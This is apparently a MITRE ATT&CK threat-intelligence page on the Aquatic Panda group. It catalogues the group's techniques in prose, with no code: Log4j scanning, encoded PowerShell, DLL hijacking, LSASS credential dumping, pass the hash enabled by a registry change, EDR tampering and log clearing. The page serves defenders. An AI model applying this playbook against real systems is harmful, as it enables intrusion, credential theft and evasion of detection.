G0143 Aquatic Panda
Aquatic Panda is a suspected China-based threat group with a dual mission of intelligence collection and industrial espionage. Active since at least May 2020, Aquatic Panda has primarily targeted entities in the telecommunications, technology, and government sectors.1
| Item | Value |
|---|---|
| ID | G0143 |
| Associated Names | |
| Version | 2.0 |
| Created | 18 January 2022 |
| Last Modified | 10 October 2024 |
| Navigation Layer | View In ATT&CK® Navigator |
Techniques Used
| Domain | ID | Name | Use |
|---|---|---|---|
| enterprise | T1087 | Account Discovery | Aquatic Panda used the last command in Linux environments to identify recently logged-in users on victim machines.2 |
| enterprise | T1595 | Active Scanning | - |
| enterprise | T1595.002 | Vulnerability Scanning | Aquatic Panda has used publicly accessible DNS logging services to identify servers vulnerable to Log4j (CVE 2021-44228).1 |
| enterprise | T1560 | Archive Collected Data | - |
| enterprise | T1560.001 | Archive via Utility | Aquatic Panda has used several publicly available tools, including WinRAR and 7zip, to compress collected files and memory dumps prior to exfiltration.12 |
| enterprise | T1059 | Command and Scripting Interpreter | - |
| enterprise | T1059.001 | PowerShell | Aquatic Panda has downloaded additional scripts and executed Base64 encoded commands in PowerShell.1 |
| enterprise | T1059.003 | Windows Command Shell | Aquatic Panda has attempted and failed to run Bash commands on a Windows host by passing them to cmd /C.1 |
| enterprise | T1059.004 | Unix Shell | Aquatic Panda used malicious shell scripts in Linux environments following access via SSH to install Linux versions of Winnti malware.2 |
| enterprise | T1543 | Create or Modify System Process | - |
| enterprise | T1543.003 | Windows Service | Aquatic Panda created new Windows services for persistence that masqueraded as legitimate Windows services via name change.2 |
| enterprise | T1005 | Data from Local System | Aquatic Panda captured local Windows security event log data from victim machines using the wevtutil utility to extract contents to an evtx output file.2 |
| enterprise | T1574 | Hijack Execution Flow | - |
| enterprise | T1574.001 | DLL | Aquatic Panda has used DLL search-order hijacking to load exe, dll, and dat files into memory.1 Aquatic Panda loaded a malicious DLL into the legitimate Windows Security Health Service executable (SecurityHealthService.exe) to execute malicious code on victim systems.2 |
| enterprise | T1574.006 | Dynamic Linker Hijacking | Aquatic Panda modified the ld.so preload file in Linux environments to enable persistence for Winnti malware.2 |
| enterprise | T1562 | Impair Defenses | - |
| enterprise | T1562.001 | Disable or Modify Tools | Aquatic Panda has attempted to stop endpoint detection and response (EDR) tools on compromised systems.1 |
| enterprise | T1070 | Indicator Removal | - |
| enterprise | T1070.001 | Clear Windows Event Logs | Aquatic Panda clears Windows Event Logs following activity to evade defenses.2 |
| enterprise | T1070.003 | Clear Command History | Aquatic Panda cleared command history in Linux environments to remove traces of activity after operations.2 |
| enterprise | T1070.004 | File Deletion | Aquatic Panda has deleted malicious executables from compromised machines.12 |
| enterprise | T1105 | Ingress Tool Transfer | Aquatic Panda has downloaded additional malware onto compromised hosts.1 |
| enterprise | T1654 | Log Enumeration | Aquatic Panda enumerated logs related to authentication in Linux environments prior to deleting selective entries for defense evasion purposes.2 |
| enterprise | T1036 | Masquerading | - |
| enterprise | T1036.004 | Masquerade Task or Service | Aquatic Panda created new, malicious services using names such as Windows User Service to attempt to blend in with legitimate items on victim systems.2 |
| enterprise | T1036.005 | Match Legitimate Resource Name or Location | Aquatic Panda renamed or moved malicious binaries to legitimate locations to evade defenses and blend into victim environments.2 |
| enterprise | T1112 | Modify Registry | Aquatic Panda modified the victim registry to enable the RestrictedAdmin mode feature, allowing for pass the hash behaviors to function via RDP.2 |
| enterprise | T1027 | Obfuscated Files or Information | - |
| enterprise | T1027.010 | Command Obfuscation | Aquatic Panda has encoded PowerShell commands in Base64.1 |
| enterprise | T1588 | Obtain Capabilities | - |
| enterprise | T1588.001 | Malware | Aquatic Panda has acquired and used njRAT in its operations.1 |
| enterprise | T1588.002 | Tool | Aquatic Panda has acquired and used Cobalt Strike in its operations.1 |
| enterprise | T1003 | OS Credential Dumping | - |
| enterprise | T1003.001 | LSASS Memory | Aquatic Panda has attempted to harvest credentials through LSASS memory dumping.1 |
| enterprise | T1021 | Remote Services | Aquatic Panda used remote scheduled tasks to install malicious software on victim systems during lateral movement actions.2 |
| enterprise | T1021.001 | Remote Desktop Protocol | Aquatic Panda leveraged stolen credentials to move laterally via RDP in victim environments.2 |
| enterprise | T1021.002 | SMB/Windows Admin Shares | Aquatic Panda used remote shares to enable lateral movement in victim environments.2 |
| enterprise | T1021.004 | SSH | Aquatic Panda used SSH with captured user credentials to move laterally in victim environments.2 |
| enterprise | T1518 | Software Discovery | - |
| enterprise | T1518.001 | Security Software Discovery | Aquatic Panda has attempted to discover third party endpoint detection and response (EDR) tools on compromised systems.1 |
| enterprise | T1218 | System Binary Proxy Execution | - |
| enterprise | T1218.011 | Rundll32 | Aquatic Panda used rundll32.exe to proxy execution of a malicious DLL file identified as a keylogging binary.2 |
| enterprise | T1082 | System Information Discovery | Aquatic Panda has used native OS commands to understand privilege levels and system details.1 |
| enterprise | T1033 | System Owner/User Discovery | Aquatic Panda gathers information on recently logged-in users on victim devices.2 |
| enterprise | T1007 | System Service Discovery | Aquatic Panda has attempted to discover services for third party EDR products.1 |
| enterprise | T1550 | Use Alternate Authentication Material | - |
| enterprise | T1550.002 | Pass the Hash | Aquatic Panda used a registry edit to enable a Windows feature called RestrictedAdmin in victim environments. This change allowed Aquatic Panda to leverage “pass the hash” mechanisms as the alteration allows for RDP connections with a valid account name and hash only, without possessing a cleartext password value.2 |
| enterprise | T1078 | Valid Accounts | - |
| enterprise | T1078.002 | Domain Accounts | Aquatic Panda used multiple mechanisms to capture valid user accounts for victim domains to enable lateral movement and access to additional hosts in victim environments.2 |
| enterprise | T1047 | Windows Management Instrumentation | Aquatic Panda used WMI for lateral movement in victim environments.2 |
Software
References
-
Wiley, B. et al. (2021, December 29). OverWatch Exposes AQUATIC PANDA in Possession of Log4Shell Exploit Tools During Hands-on Intrusion Attempt. Retrieved January 18, 2022. ↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩
-
CrowdStrike. (2023). 2022 Falcon OverWatch Threat Hunting Report. Retrieved May 20, 2024. ↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩